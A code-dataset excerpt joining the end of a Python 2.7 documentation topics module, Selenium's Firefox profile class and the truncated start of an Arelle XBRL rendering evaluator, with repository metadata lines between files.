' 'the\n' ' leading character of the result is not already a zero.\n' '\n' '3. The alternate form causes the result to always contain a ' 'decimal\n' ' point, even if no digits follow it.\n' '\n' ' The precision determines the number of digits after the ' 'decimal\n' ' point and defaults to 6.\n' '\n' '4. The alternate form causes the result to always contain a ' 'decimal\n' ' point, and trailing zeroes are not removed as they would ' 'otherwise\n' ' be.\n' '\n' ' The precision determines the number of significant digits ' 'before\n' ' and after the decimal point and defaults to 6.\n' '\n' '5. The "%r" conversion was added in Python 2.0.\n' '\n' ' The precision determines the maximal number of characters ' 'used.\n' '\n' '6. If the object or format provided is a "unicode" string, the\n' ' resulting string will also be "unicode".\n' '\n' ' The precision determines the maximal number of characters ' 'used.\n' '\n' '7. See **PEP 237**.\n' '\n' 'Since Python strings have an explicit length, "%s" conversions ' 'do not\n' 'assume that "\'\\0\'" is the end of the string.\n' '\n' 'Changed in version 2.7: "%f" conversions for numbers whose ' 'absolute\n' 'value is over 1e50 are no longer replaced by "%g" conversions.\n' '\n' 'Additional string operations are defined in standard modules ' '"string"\n' 'and "re".\n' '\n' '\n' 'XRange Type\n' '===========\n' '\n' 'The "xrange" type is an immutable sequence which is commonly ' 'used for\n' 'looping. The advantage of the "xrange" type is that an ' '"xrange"\n' 'object will always take the same amount of memory, no matter the ' 'size\n' 'of the range it represents. There are no consistent ' 'performance\n' 'advantages.\n' '\n' 'XRange objects have very little behavior: they only support ' 'indexing,\n' 'iteration, and the "len()" function.\n' '\n' '\n' 'Mutable Sequence Types\n' '======================\n' '\n' 'List and "bytearray" objects support additional operations that ' 'allow\n' 'in-place modification of the object. Other mutable sequence ' 'types\n' '(when added to the language) should also support these ' 'operations.\n' 'Strings and tuples are immutable sequence types: such objects ' 'cannot\n' 'be modified once created. The following operations are defined ' 'on\n' 'mutable sequence types (where *x* is an arbitrary object):\n' '\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| Operation | ' 'Result | Notes |\n' '+================================+==================================+=======================+\n' '| "s[i] = x" | item *i* of *s* is replaced ' 'by | |\n' '| | ' '*x* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s[i:j] = t" | slice of *s* from *i* to *j* ' 'is | |\n' '| | replaced by the contents of ' 'the | |\n' '| | iterable ' '*t* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "del s[i:j]" | same as "s[i:j] = ' '[]" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s[i:j:k] = t" | the elements of "s[i:j:k]" ' 'are | (1) |\n' '| | replaced by those of ' '*t* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "del s[i:j:k]" | removes the elements ' 'of | |\n' '| | "s[i:j:k]" from the ' 'list | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.append(x)" | same as "s[len(s):len(s)] = ' '[x]" | (2) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.extend(x)" or "s += t" | for the most part the same ' 'as | (3) |\n' '| | "s[len(s):len(s)] = ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s *= n" | updates *s* with its ' 'contents | (11) |\n' '| | repeated *n* ' 'times | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.count(x)" | return number of *i*\'s for ' 'which | |\n' '| | "s[i] == ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.index(x[, i[, j]])" | return smallest *k* such ' 'that | (4) |\n' '| | "s[k] == x" and "i <= k < ' 'j" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.insert(i, x)" | same as "s[i:i] = ' '[x]" | (5) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.pop([i])" | same as "x = s[i]; del ' 's[i]; | (6) |\n' '| | return ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.remove(x)" | same as "del ' 's[s.index(x)]" | (4) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.reverse()" | reverses the items of *s* ' 'in | (7) |\n' '| | ' 'place | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.sort([cmp[, key[, | sort the items of *s* in ' 'place | (7)(8)(9)(10) |\n' '| reverse]]])" ' '| | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '\n' 'Notes:\n' '\n' '1. *t* must have the same length as the slice it is replacing.\n' '\n' '2. The C implementation of Python has historically accepted\n' ' multiple parameters and implicitly joined them into a tuple; ' 'this\n' ' no longer works in Python 2.0. Use of this misfeature has ' 'been\n' ' deprecated since Python 1.4.\n' '\n' '3. *x* can be any iterable object.\n' '\n' '4. Raises "ValueError" when *x* is not found in *s*. When a\n' ' negative index is passed as the second or third parameter to ' 'the\n' ' "index()" method, the list length is added, as for slice ' 'indices.\n' ' If it is still negative, it is truncated to zero, as for ' 'slice\n' ' indices.\n' '\n' ' Changed in version 2.3: Previously, "index()" didn\'t have ' 'arguments\n' ' for specifying start and stop positions.\n' '\n' '5. When a negative index is passed as the first parameter to ' 'the\n' ' "insert()" method, the list length is added, as for slice ' 'indices.\n' ' If it is still negative, it is truncated to zero, as for ' 'slice\n' ' indices.\n' '\n' ' Changed in version 2.3: Previously, all negative indices ' 'were\n' ' truncated to zero.\n' '\n' '6. The "pop()" method\'s optional argument *i* defaults to "-1", ' 'so\n' ' that by default the last item is removed and returned.\n' '\n' '7. The "sort()" and "reverse()" methods modify the list in ' 'place\n' ' for economy of space when sorting or reversing a large list. ' 'To\n' " remind you that they operate by side effect, they don't " 'return the\n' ' sorted or reversed list.\n' '\n' '8. The "sort()" method takes optional arguments for controlling ' 'the\n' ' comparisons.\n' '\n' ' *cmp* specifies a custom comparison function of two arguments ' '(list\n' ' items) which should return a negative, zero or positive ' 'number\n' ' depending on whether the first argument is considered smaller ' 'than,\n' ' equal to, or larger than the second argument: "cmp=lambda ' 'x,y:\n' ' cmp(x.lower(), y.lower())". The default value is "None".\n' '\n' ' *key* specifies a function of one argument that is used to ' 'extract\n' ' a comparison key from each list element: "key=str.lower". ' 'The\n' ' default value is "None".\n' '\n' ' *reverse* is a boolean value. If set to "True", then the ' 'list\n' ' elements are sorted as if each comparison were reversed.\n' '\n' ' In general, the *key* and *reverse* conversion processes are ' 'much\n' ' faster than specifying an equivalent *cmp* function. This ' 'is\n' ' because *cmp* is called multiple times for each list element ' 'while\n' ' *key* and *reverse* touch each element only once. Use\n' ' "functools.cmp_to_key()" to convert an old-style *cmp* ' 'function to\n' ' a *key* function.\n' '\n' ' Changed in version 2.3: Support for "None" as an equivalent ' 'to\n' ' omitting *cmp* was added.\n' '\n' ' Changed in version 2.4: Support for *key* and *reverse* was ' 'added.\n' '\n' '9. Starting with Python 2.3, the "sort()" method is guaranteed ' 'to\n' ' be stable. A sort is stable if it guarantees not to change ' 'the\n' ' relative order of elements that compare equal --- this is ' 'helpful\n' ' for sorting in multiple passes (for example, sort by ' 'department,\n' ' then by salary grade).\n' '\n' '10. **CPython implementation detail:** While a list is being\n' ' sorted, the effect of attempting to mutate, or even inspect, ' 'the\n' ' list is undefined. The C implementation of Python 2.3 and ' 'newer\n' ' makes the list appear empty for the duration, and raises\n' ' "ValueError" if it can detect that the list has been ' 'mutated\n' ' during a sort.\n' '\n' '11. The value *n* is an integer, or an object implementing\n' ' "__index__()". Zero and negative values of *n* clear the\n' ' sequence. Items in the sequence are not copied; they are\n' ' referenced multiple times, as explained for "s * n" under ' 'Sequence\n' ' Types --- str, unicode, list, tuple, bytearray, buffer, ' 'xrange.\n', 'typesseq-mutable': '\n' 'Mutable Sequence Types\n' '**********************\n' '\n' 'List and "bytearray" objects support additional ' 'operations that allow\n' 'in-place modification of the object. Other mutable ' 'sequence types\n' '(when added to the language) should also support these ' 'operations.\n' 'Strings and tuples are immutable sequence types: such ' 'objects cannot\n' 'be modified once created. The following operations are ' 'defined on\n' 'mutable sequence types (where *x* is an arbitrary ' 'object):\n' '\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| Operation | ' 'Result | Notes ' '|\n' '+================================+==================================+=======================+\n' '| "s[i] = x" | item *i* of *s* is ' 'replaced by | |\n' '| | ' '*x* | ' '|\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s[i:j] = t" | slice of *s* from *i* ' 'to *j* is | |\n' '| | replaced by the ' 'contents of the | |\n' '| | iterable ' '*t* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "del s[i:j]" | same as "s[i:j] = ' '[]" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s[i:j:k] = t" | the elements of ' '"s[i:j:k]" are | (1) |\n' '| | replaced by those of ' '*t* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "del s[i:j:k]" | removes the elements ' 'of | |\n' '| | "s[i:j:k]" from the ' 'list | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.append(x)" | same as ' '"s[len(s):len(s)] = [x]" | (2) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.extend(x)" or "s += t" | for the most part the ' 'same as | (3) |\n' '| | "s[len(s):len(s)] = ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s *= n" | updates *s* with its ' 'contents | (11) |\n' '| | repeated *n* ' 'times | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.count(x)" | return number of ' "*i*'s for which | |\n" '| | "s[i] == ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.index(x[, i[, j]])" | return smallest *k* ' 'such that | (4) |\n' '| | "s[k] == x" and "i <= ' 'k < j" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.insert(i, x)" | same as "s[i:i] = ' '[x]" | (5) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.pop([i])" | same as "x = s[i]; ' 'del s[i]; | (6) |\n' '| | return ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.remove(x)" | same as "del ' 's[s.index(x)]" | (4) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.reverse()" | reverses the items of ' '*s* in | (7) |\n' '| | ' 'place | ' '|\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.sort([cmp[, key[, | sort the items of *s* ' 'in place | (7)(8)(9)(10) |\n' '| reverse]]])" ' '| ' '| |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '\n' 'Notes:\n' '\n' '1. *t* must have the same length as the slice it is ' 'replacing.\n' '\n' '2. The C implementation of Python has historically ' 'accepted\n' ' multiple parameters and implicitly joined them into a ' 'tuple; this\n' ' no longer works in Python 2.0. Use of this ' 'misfeature has been\n' ' deprecated since Python 1.4.\n' '\n' '3. *x* can be any iterable object.\n' '\n' '4. Raises "ValueError" when *x* is not found in *s*. ' 'When a\n' ' negative index is passed as the second or third ' 'parameter to the\n' ' "index()" method, the list length is added, as for ' 'slice indices.\n' ' If it is still negative, it is truncated to zero, as ' 'for slice\n' ' indices.\n' '\n' ' Changed in version 2.3: Previously, "index()" didn\'t ' 'have arguments\n' ' for specifying start and stop positions.\n' '\n' '5. When a negative index is passed as the first ' 'parameter to the\n' ' "insert()" method, the list length is added, as for ' 'slice indices.\n' ' If it is still negative, it is truncated to zero, as ' 'for slice\n' ' indices.\n' '\n' ' Changed in version 2.3: Previously, all negative ' 'indices were\n' ' truncated to zero.\n' '\n' '6. The "pop()" method\'s optional argument *i* defaults ' 'to "-1", so\n' ' that by default the last item is removed and ' 'returned.\n' '\n' '7. The "sort()" and "reverse()" methods modify the list ' 'in place\n' ' for economy of space when sorting or reversing a ' 'large list. To\n' ' remind you that they operate by side effect, they ' "don't return the\n" ' sorted or reversed list.\n' '\n' '8. The "sort()" method takes optional arguments for ' 'controlling the\n' ' comparisons.\n' '\n' ' *cmp* specifies a custom comparison function of two ' 'arguments (list\n' ' items) which should return a negative, zero or ' 'positive number\n' ' depending on whether the first argument is considered ' 'smaller than,\n' ' equal to, or larger than the second argument: ' '"cmp=lambda x,y:\n' ' cmp(x.lower(), y.lower())". The default value is ' '"None".\n' '\n' ' *key* specifies a function of one argument that is ' 'used to extract\n' ' a comparison key from each list element: ' '"key=str.lower". The\n' ' default value is "None".\n' '\n' ' *reverse* is a boolean value. If set to "True", then ' 'the list\n' ' elements are sorted as if each comparison were ' 'reversed.\n' '\n' ' In general, the *key* and *reverse* conversion ' 'processes are much\n' ' faster than specifying an equivalent *cmp* function. ' 'This is\n' ' because *cmp* is called multiple times for each list ' 'element while\n' ' *key* and *reverse* touch each element only once. ' 'Use\n' ' "functools.cmp_to_key()" to convert an old-style ' '*cmp* function to\n' ' a *key* function.\n' '\n' ' Changed in version 2.3: Support for "None" as an ' 'equivalent to\n' ' omitting *cmp* was added.\n' '\n' ' Changed in version 2.4: Support for *key* and ' '*reverse* was added.\n' '\n' '9. Starting with Python 2.3, the "sort()" method is ' 'guaranteed to\n' ' be stable. A sort is stable if it guarantees not to ' 'change the\n' ' relative order of elements that compare equal --- ' 'this is helpful\n' ' for sorting in multiple passes (for example, sort by ' 'department,\n' ' then by salary grade).\n' '\n' '10. **CPython implementation detail:** While a list is ' 'being\n' ' sorted, the effect of attempting to mutate, or even ' 'inspect, the\n' ' list is undefined. The C implementation of Python ' '2.3 and newer\n' ' makes the list appear empty for the duration, and ' 'raises\n' ' "ValueError" if it can detect that the list has been ' 'mutated\n' ' during a sort.\n' '\n' '11. The value *n* is an integer, or an object ' 'implementing\n' ' "__index__()". Zero and negative values of *n* ' 'clear the\n' ' sequence. Items in the sequence are not copied; ' 'they are\n' ' referenced multiple times, as explained for "s * n" ' 'under Sequence\n' ' Types --- str, unicode, list, tuple, bytearray, ' 'buffer, xrange.\n', 'unary': '\n' 'Unary arithmetic and bitwise operations\n' '***************************************\n' '\n' 'All unary arithmetic and bitwise operations have the same ' 'priority:\n' '\n' ' u_expr ::= power | "-" u_expr | "+" u_expr | "~" u_expr\n' '\n' 'The unary "-" (minus) operator yields the negation of its numeric\n' 'argument.\n' '\n' 'The unary "+" (plus) operator yields its numeric argument ' 'unchanged.\n' '\n' 'The unary "~" (invert) operator yields the bitwise inversion of ' 'its\n' 'plain or long integer argument. The bitwise inversion of "x" is\n' 'defined as "-(x+1)". It only applies to integral numbers.\n' '\n' 'In all three cases, if the argument does not have the proper type, ' 'a\n' '"TypeError" exception is raised.\n', 'while': '\n' 'The "while" statement\n' '*********************\n' '\n' 'The "while" statement is used for repeated execution as long as an\n' 'expression is true:\n' '\n' ' while_stmt ::= "while" expression ":" suite\n' ' ["else" ":" suite]\n' '\n' 'This repeatedly tests the expression and, if it is true, executes ' 'the\n' 'first suite; if the expression is false (which may be the first ' 'time\n' 'it is tested) the suite of the "else" clause, if present, is ' 'executed\n' 'and the loop terminates.\n' '\n' 'A "break" statement executed in the first suite terminates the ' 'loop\n' 'without executing the "else" clause\'s suite. A "continue" ' 'statement\n' 'executed in the first suite skips the rest of the suite and goes ' 'back\n' 'to testing the expression.\n', 'with': '\n' 'The "with" statement\n' '********************\n' '\n' 'New in version 2.5.\n' '\n' 'The "with" statement is used to wrap the execution of a block with\n' 'methods defined by a context manager (see section With Statement\n' 'Context Managers). This allows common "try"..."except"..."finally"\n' 'usage patterns to be encapsulated for convenient reuse.\n' '\n' ' with_stmt ::= "with" with_item ("," with_item)* ":" suite\n' ' with_item ::= expression ["as" target]\n' '\n' 'The execution of the "with" statement with one "item" proceeds as\n' 'follows:\n' '\n' '1. The context expression (the expression given in the "with_item")\n' ' is evaluated to obtain a context manager.\n' '\n' '2. The context manager\'s "__exit__()" is loaded for later use.\n' '\n' '3. The context manager\'s "__enter__()" method is invoked.\n' '\n' '4. If a target was included in the "with" statement, the return\n' ' value from "__enter__()" is assigned to it.\n' '\n' ' Note: The "with" statement guarantees that if the "__enter__()"\n' ' method returns without an error, then "__exit__()" will always ' 'be\n' ' called. Thus, if an error occurs during the assignment to the\n' ' target list, it will be treated the same as an error occurring\n' ' within the suite would be. See step 6 below.\n' '\n' '5. The suite is executed.\n' '\n' '6. The context manager\'s "__exit__()" method is invoked. If an\n' ' exception caused the suite to be exited, its type, value, and\n' ' traceback are passed as arguments to "__exit__()". Otherwise, ' 'three\n' ' "None" arguments are supplied.\n' '\n' ' If the suite was exited due to an exception, and the return ' 'value\n' ' from the "__exit__()" method was false, the exception is ' 'reraised.\n' ' If the return value was true, the exception is suppressed, and\n' ' execution continues with the statement following the "with"\n' ' statement.\n' '\n' ' If the suite was exited for any reason other than an exception, ' 'the\n' ' return value from "__exit__()" is ignored, and execution ' 'proceeds\n' ' at the normal location for the kind of exit that was taken.\n' '\n' 'With more than one item, the context managers are processed as if\n' 'multiple "with" statements were nested:\n' '\n' ' with A() as a, B() as b:\n' ' suite\n' '\n' 'is equivalent to\n' '\n' ' with A() as a:\n' ' with B() as b:\n' ' suite\n' '\n' 'Note: In Python 2.5, the "with" statement is only allowed when the\n' ' "with_statement" feature has been enabled. It is always enabled ' 'in\n' ' Python 2.6.\n' '\n' 'Changed in version 2.7: Support for multiple context expressions.\n' '\n' 'See also:\n' '\n' ' **PEP 343** - The "with" statement\n' ' The specification, background, and examples for the Python ' '"with"\n' ' statement.\n', 'yield': '\n' 'The "yield" statement\n' '*********************\n' '\n' ' yield_stmt ::= yield_expression\n' '\n' 'The "yield" statement is only used when defining a generator ' 'function,\n' 'and is only used in the body of the generator function. Using a\n' '"yield" statement in a function definition is sufficient to cause ' 'that\n' 'definition to create a generator function instead of a normal\n' 'function.\n' '\n' 'When a generator function is called, it returns an iterator known ' 'as a\n' 'generator iterator, or more commonly, a generator. The body of ' 'the\n' "generator function is executed by calling the generator's " '"next()"\n' 'method repeatedly until it raises an exception.\n' '\n' 'When a "yield" statement is executed, the state of the generator ' 'is\n' 'frozen and the value of "expression_list" is returned to ' '"next()"\'s\n' 'caller. By "frozen" we mean that all local state is retained,\n' 'including the current bindings of local variables, the instruction\n' 'pointer, and the internal evaluation stack: enough information is\n' 'saved so that the next time "next()" is invoked, the function can\n' 'proceed exactly as if the "yield" statement were just another ' 'external\n' 'call.\n' '\n' 'As of Python version 2.5, the "yield" statement is now allowed in ' 'the\n' '"try" clause of a "try" ... "finally" construct. If the generator ' 'is\n' 'not resumed before it is finalized (by reaching a zero reference ' 'count\n' "or by being garbage collected), the generator-iterator's " '"close()"\n' 'method will be called, allowing any pending "finally" clauses to\n' 'execute.\n' '\n' 'For full details of "yield" semantics, refer to the Yield ' 'expressions\n' 'section.\n' '\n' 'Note: In Python 2.2, the "yield" statement was only allowed when ' 'the\n' ' "generators" feature has been enabled. This "__future__" import\n' ' statement was used to enable the feature:\n' '\n' ' from __future__ import generators\n' '\n' 'See also:\n' '\n' ' **PEP 255** - Simple Generators\n' ' The proposal for adding generators and the "yield" statement ' 'to\n' ' Python.\n' '\n' ' **PEP 342** - Coroutines via Enhanced Generators\n' ' The proposal that, among other generator enhancements, ' 'proposed\n' ' allowing "yield" to appear inside a "try" ... "finally" ' 'block.\n'}
mit
kenshay/ImageScripter
ProgramData/SystemFiles/Python/Lib/site-packages/selenium/webdriver/firefox/firefox_profile.py
2
14867
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import with_statement import base64 import copy import json import os import re import shutil import sys import tempfile import zipfile try: from cStringIO import StringIO as BytesIO except ImportError: from io import BytesIO from xml.dom import minidom from selenium.webdriver.common.proxy import ProxyType from selenium.common.exceptions import WebDriverException WEBDRIVER_EXT = "webdriver.xpi" WEBDRIVER_PREFERENCES = "webdriver_prefs.json" EXTENSION_NAME = "fxdriver@googlecode.com" class AddonFormatError(Exception): """Exception for not well-formed add-on manifest files""" class FirefoxProfile(object): ANONYMOUS_PROFILE_NAME = "WEBDRIVER_ANONYMOUS_PROFILE" DEFAULT_PREFERENCES = None def __init__(self, profile_directory=None): """ Initialises a new instance of a Firefox Profile :args: - profile_directory: Directory of profile that you want to use. This defaults to None and will create a new directory when object is created. """ if not FirefoxProfile.DEFAULT_PREFERENCES: with open(os.path.join(os.path.dirname(__file__), WEBDRIVER_PREFERENCES)) as default_prefs: FirefoxProfile.DEFAULT_PREFERENCES = json.load(default_prefs) self.default_preferences = copy.deepcopy( FirefoxProfile.DEFAULT_PREFERENCES['mutable']) self.native_events_enabled = True self.profile_dir = profile_directory self.tempfolder = None if self.profile_dir is None: self.profile_dir = self._create_tempfolder() else: self.tempfolder = tempfile.mkdtemp() newprof = os.path.join(self.tempfolder, "webdriver-py-profilecopy") shutil.copytree(self.profile_dir, newprof, ignore=shutil.ignore_patterns("parent.lock", "lock", ".parentlock")) self.profile_dir = newprof os.chmod(self.profile_dir, 0o755) self._read_existing_userjs(os.path.join(self.profile_dir, "user.js")) self.extensionsDir = os.path.join(self.profile_dir, "extensions") self.userPrefs = os.path.join(self.profile_dir, "user.js") if os.path.isfile(self.userPrefs): os.chmod(self.userPrefs, 0o644) # Public Methods def set_preference(self, key, value): """ sets the preference that we want in the profile. """ self.default_preferences[key] = value def add_extension(self, extension=WEBDRIVER_EXT): self._install_extension(extension) def update_preferences(self): for key, value in FirefoxProfile.DEFAULT_PREFERENCES['frozen'].items(): self.default_preferences[key] = value self._write_user_prefs(self.default_preferences) # Properties @property def path(self): """ Gets the profile directory that is currently being used """ return self.profile_dir @property def port(self): """ Gets the port that WebDriver is working on """ return self._port @port.setter def port(self, port): """ Sets the port that WebDriver will be running on """ if not isinstance(port, int): raise WebDriverException("Port needs to be an integer") try: port = int(port) if port < 1 or port > 65535: raise WebDriverException("Port number must be in the range 1..65535") except (ValueError, TypeError): raise WebDriverException("Port needs to be an integer") self._port = port self.set_preference("webdriver_firefox_port", self._port) @property def accept_untrusted_certs(self): return self.default_preferences["webdriver_accept_untrusted_certs"] @accept_untrusted_certs.setter def accept_untrusted_certs(self, value): if value not in [True, False]: raise WebDriverException("Please pass in a Boolean to this call") self.set_preference("webdriver_accept_untrusted_certs", value) @property def assume_untrusted_cert_issuer(self): return self.default_preferences["webdriver_assume_untrusted_issuer"] @assume_untrusted_cert_issuer.setter def assume_untrusted_cert_issuer(self, value): if value not in [True, False]: raise WebDriverException("Please pass in a Boolean to this call") self.set_preference("webdriver_assume_untrusted_issuer", value) @property def native_events_enabled(self): return self.default_preferences['webdriver_enable_native_events'] @native_events_enabled.setter def native_events_enabled(self, value): if value not in [True, False]: raise WebDriverException("Please pass in a Boolean to this call") self.set_preference("webdriver_enable_native_events", value) @property def encoded(self): """ A zipped, base64 encoded string of profile directory for use with remote WebDriver JSON wire protocol """ self.update_preferences() fp = BytesIO() zipped = zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED) path_root = len(self.path) + 1 # account for trailing slash for base, dirs, files in os.walk(self.path): for fyle in files: filename = os.path.join(base, fyle) zipped.write(filename, filename[path_root:]) zipped.close() return base64.b64encode(fp.getvalue()).decode('UTF-8') def set_proxy(self, proxy): import warnings warnings.warn( "This method has been deprecated. Please pass in the proxy object to the Driver Object", DeprecationWarning, stacklevel=2) if proxy is None: raise ValueError("proxy can not be None") if proxy.proxy_type is ProxyType.UNSPECIFIED: return self.set_preference("network.proxy.type", proxy.proxy_type['ff_value']) if proxy.proxy_type is ProxyType.MANUAL: self.set_preference("network.proxy.no_proxies_on", proxy.no_proxy) self._set_manual_proxy_preference("ftp", proxy.ftp_proxy) self._set_manual_proxy_preference("http", proxy.http_proxy) self._set_manual_proxy_preference("ssl", proxy.ssl_proxy) self._set_manual_proxy_preference("socks", proxy.socks_proxy) elif proxy.proxy_type is ProxyType.PAC: self.set_preference("network.proxy.autoconfig_url", proxy.proxy_autoconfig_url) def _set_manual_proxy_preference(self, key, setting): if setting is None or setting is '': return host_details = setting.split(":") self.set_preference("network.proxy.%s" % key, host_details[0]) if len(host_details) > 1: self.set_preference("network.proxy.%s_port" % key, int(host_details[1])) def _create_tempfolder(self): """ Creates a temp folder to store User.js and the extension """ return tempfile.mkdtemp() def _write_user_prefs(self, user_prefs): """ writes the current user prefs dictionary to disk """ with open(self.userPrefs, "w") as f: for key, value in user_prefs.items(): f.write('user_pref("%s", %s);\n' % (key, json.dumps(value))) def _read_existing_userjs(self, userjs): import warnings PREF_RE = re.compile(r'user_pref\("(.*)",\s(.*)\)') try: with open(userjs) as f: for usr in f: matches = re.search(PREF_RE, usr) try: self.default_preferences[matches.group(1)] = json.loads(matches.group(2)) except Exception: warnings.warn("(skipping) failed to json.loads existing preference: " + matches.group(1) + matches.group(2)) except Exception: # The profile given hasn't had any changes made, i.e no users.js pass def _install_extension(self, addon, unpack=True): """ Installs addon from a filepath, url or directory of addons in the profile. - path: url, absolute path to .xpi, or directory of addons - unpack: whether to unpack unless specified otherwise in the install.rdf """ if addon == WEBDRIVER_EXT: addon = os.path.join(os.path.dirname(__file__), WEBDRIVER_EXT) tmpdir = None xpifile = None if addon.endswith('.xpi'): tmpdir = tempfile.mkdtemp(suffix='.' + os.path.split(addon)[-1]) compressed_file = zipfile.ZipFile(addon, 'r') for name in compressed_file.namelist(): if name.endswith('/'): if not os.path.isdir(os.path.join(tmpdir, name)): os.makedirs(os.path.join(tmpdir, name)) else: if not os.path.isdir(os.path.dirname(os.path.join(tmpdir, name))): os.makedirs(os.path.dirname(os.path.join(tmpdir, name))) data = compressed_file.read(name) with open(os.path.join(tmpdir, name), 'wb') as f: f.write(data) xpifile = addon addon = tmpdir # determine the addon id addon_details = self._addon_details(addon) addon_id = addon_details.get('id') assert addon_id, 'The addon id could not be found: %s' % addon # copy the addon to the profile addon_path = os.path.join(self.extensionsDir, addon_id) if not unpack and not addon_details['unpack'] and xpifile: if not os.path.exists(self.extensionsDir): os.makedirs(self.extensionsDir) os.chmod(self.extensionsDir, 0o755) shutil.copy(xpifile, addon_path + '.xpi') else: if not os.path.exists(addon_path): shutil.copytree(addon, addon_path, symlinks=True) # remove the temporary directory, if any if tmpdir: shutil.rmtree(tmpdir) def _addon_details(self, addon_path): """ Returns a dictionary of details about the addon. :param addon_path: path to the add-on directory or XPI Returns:: {'id': u'rainbow@colors.org', # id of the addon 'version': u'1.4', # version of the addon 'name': u'Rainbow', # name of the addon 'unpack': False } # whether to unpack the addon """ details = { 'id': None, 'unpack': False, 'name': None, 'version': None } def get_namespace_id(doc, url): attributes = doc.documentElement.attributes namespace = "" for i in range(attributes.length): if attributes.item(i).value == url: if ":" in attributes.item(i).name: # If the namespace is not the default one remove 'xlmns:' namespace = attributes.item(i).name.split(':')[1] + ":" break return namespace def get_text(element): """Retrieve the text value of a given node""" rc = [] for node in element.childNodes: if node.nodeType == node.TEXT_NODE: rc.append(node.data) return ''.join(rc).strip() if not os.path.exists(addon_path): raise IOError('Add-on path does not exist: %s' % addon_path) try: if zipfile.is_zipfile(addon_path): # Bug 944361 - We cannot use 'with' together with zipFile because # it will cause an exception thrown in Python 2.6. try: compressed_file = zipfile.ZipFile(addon_path, 'r') manifest = compressed_file.read('install.rdf') finally: compressed_file.close() elif os.path.isdir(addon_path): with open(os.path.join(addon_path, 'install.rdf'), 'r') as f: manifest = f.read() else: raise IOError('Add-on path is neither an XPI nor a directory: %s' % addon_path) except (IOError, KeyError) as e: raise AddonFormatError(str(e), sys.exc_info()[2]) try: doc = minidom.parseString(manifest) # Get the namespaces abbreviations em = get_namespace_id(doc, 'http://www.mozilla.org/2004/em-rdf#') rdf = get_namespace_id(doc, 'http://www.w3.org/1999/02/22-rdf-syntax-ns#') description = doc.getElementsByTagName(rdf + 'Description').item(0) if description is None: description = doc.getElementsByTagName('Description').item(0) for node in description.childNodes: # Remove the namespace prefix from the tag for comparison entry = node.nodeName.replace(em, "") if entry in details.keys(): details.update({entry: get_text(node)}) if details.get('id') is None: for i in range(description.attributes.length): attribute = description.attributes.item(i) if attribute.name == em + 'id': details.update({'id': attribute.value}) except Exception as e: raise AddonFormatError(str(e), sys.exc_info()[2]) # turn unpack into a true/false value if isinstance(details['unpack'], str): details['unpack'] = details['unpack'].lower() == 'true' # If no ID is set, the add-on is invalid if details.get('id') is None: raise AddonFormatError('Add-on id could not be found.') return details
gpl-3.0
acsone/Arelle
arelle/RenderingEvaluator.py
2
16837
''' Created on Jun 6, 2012 @author: Mark V Systems Limited (c) Copyright 2012 Mark V Systems Limited, All rights reserved. ''' from arelle import XPathContext, XbrlConst, XmlUtil from arelle.ModelFormulaObject import (aspectModels, aspectStr, Aspect) from arelle.ModelRenderingObject import (CHILD_ROLLUP_FIRST, CHILD_ROLLUP_LAST, ModelDefinitionNode, ModelEuAxisCoord, ModelBreakdown, ModelClosedDefinitionNode, ModelRuleDefinitionNode, ModelFilterDefinitionNode, ModelDimensionRelationshipDefinitionNode) from arelle.ModelValue import (QName) def init(modelXbrl): # setup modelXbrl for rendering evaluation # dimension defaults required in advance of validation from arelle import ValidateXbrlDimensions, ValidateFormula, FormulaEvaluator, ModelDocument ValidateXbrlDimensions.loadDimensionDefaults(modelXbrl) hasXbrlTables = False # validate table linkbase dimensions for baseSetKey in modelXbrl.baseSets.keys(): arcrole, ELR, linkqname, arcqname = baseSetKey if ELR and linkqname and arcqname and XbrlConst.isTableRenderingArcrole(arcrole): ValidateFormula.checkBaseSet(modelXbrl, arcrole, ELR, modelXbrl.relationshipSet(arcrole,ELR,linkqname,arcqname)) if arcrole in (XbrlConst.tableBreakdown, XbrlConst.tableBreakdownMMDD, XbrlConst.tableBreakdown201305, 